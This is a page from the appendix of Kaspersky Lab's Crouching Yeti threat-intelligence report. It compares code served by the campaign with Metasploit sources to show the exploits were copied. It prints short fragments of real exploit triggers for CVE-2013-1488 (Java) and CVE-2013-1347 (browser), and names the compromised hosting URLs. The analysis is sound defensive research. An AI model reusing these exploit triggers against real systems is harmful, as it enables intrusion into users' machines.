Kaspersky_Lab_crouching_yeti_appendixes_eng_final
Kaspersky_Lab_crouching_yeti_appendixes_eng_final
Kaspersky_Lab_crouching_yeti_appendixes_eng_final
Create successful ePaper yourself
Turn your PDF publications into a flip-book with our unique Google optimized e-Paper software.
102<br />
10.3. Obvious Metasploit Rips<br />
The Yeti exploits are ripped line-for-line from the metasploit framework.<br />
For example, class files served from www.nahoonservices.com/wp-content/plugins/rss-poster/start.<br />
jar include code pulled from the msf. From the Yeti LyvAGalW.class file:<br />
System.out.println(“Here we go...”);<br />
String s = “jdbc:msf:sql://127.0.0.1:8080/sample”;<br />
String s2 = “userid”;<br />
String s3 = “password”;<br />
java.sql.Connection connection = DriverManager.getConnection(s, s2, s3);<br />
And for comparison, here is the java exploit code from metasploit framework: github.com/rapid7/<br />
metasploit-framework/blob/master/external/source/exploits/cve-2013-1488/Exploit.java:<br />
System.out.println(“Here we go...”);<br />
String url = “jdbc:msf:sql://127.0.0.1:8080/sample”;<br />
String userid = “userid”;<br />
String password = “password”;<br />
Connection con = DriverManager.getConnection(url, userid, password);<br />
Yeti’s delivery of CVE-2013-1347 from nahoonservices.com/wp-content/plugins/rss-poster/negc.<br />
html displays much the same level of technical originality. From negc.html<br />
f0 = document.createElement(‘span’);<br />
document.body.appendChild(f0);<br />
f1 = document.createElement(‘span’);<br />
document.body.appendChild(f1);<br />
f2 = document.createElement(‘span’);<br />
document.body.appendChild(f2);<br />
document.body.contentEditable=”true”;<br />
f2.appendChild(document.createElement(‘datalist’));<br />
f1.appendChild(document.createElement(‘span’));<br />
f1.appendChild(document.createElement(‘table’));<br />
try{<br />
f0.offsetParent=null;<br />
}catch(e) {<br />
}f2.innerHTML=””;<br />
TLP: Green<br />
For any inquire please contact intelreports@kaspersky.com